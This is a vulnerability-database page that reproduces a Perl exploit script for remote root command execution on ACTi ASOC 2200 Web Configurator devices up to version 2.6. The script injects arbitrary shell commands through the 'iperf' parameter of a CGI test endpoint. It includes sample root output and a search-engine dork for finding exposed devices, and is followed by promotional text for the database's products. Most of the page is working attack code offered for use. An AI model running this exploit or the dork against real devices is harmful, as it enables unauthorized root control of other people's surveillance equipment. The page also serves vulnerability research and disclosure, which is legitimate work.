Lucene search
K

ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 112 Views

ACTi ASOC 2200 Web Configurator v2.6 Remote Root Command Executio

Code

                                                #!perl
#  ACTi ASOC 2200 Web Configurator &#60;= v2.6 Remote Root Command Execution
##
#  Dicovery & Author: Todor Donev
#  Author mail: todor.donev@@gmail.com
#  Type: Hardware
#  Vuln Type and Risk: Remote / High
##
#  ACTi Corporation is the technology leader in IP surveillance,
#  focusing on multiple security surveillance market segments.
##
#  root@linux:~# perl actiroot.pl &#60;CENSORED&#62; 
#  [+] ACTi ASOC 2200 Web Configurator &#60;= v2.6 Remote Root Command Execution
#  [+] Gewgl: intitle:&#34;Web Configurator - Version v2.6&#34;
#  # id
#   execute : /sbin/iperf -c ;id  &
#   uid=0(root) gid=0(root)        ### Got Root ? o.O
##
#  Special kind regards to Tsvetelina Emirska that support me !! :) 
#
#  Prayers to all the People in Japan from Bulgaria !!!!! 
#
use LWP::Simple; 
print &#34;[+] ACTi ASOC 2200 Web Configurator &#60;= v2.6 Remote Root Command Execution\n&#34;;
print &#34;[+] Gewgl: intitle:\&#34;Web Configurator - Version v2.6\&#34;\n&#34;;
$host = $ARGV[0];
$cmd = $ARGV[1];
if(! $ARGV[0]) {
print &#34;[+] usage: perl actiroot.pl &#60;host&#62; &#60;cmd&#62;\n&#34;;
exit;
}
if(! $ARGV[1]) {
$cmd = &#34;id&#34;;
}
my $result = get(&#34;http://$host/cgi-bin/test?iperf=;$cmd &&#34;);
if (defined $result) {
print &#34;# $cmd\n $result&#34;;
}
else {
print &#34;[-] Not Vulnerable\n&#34;;
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation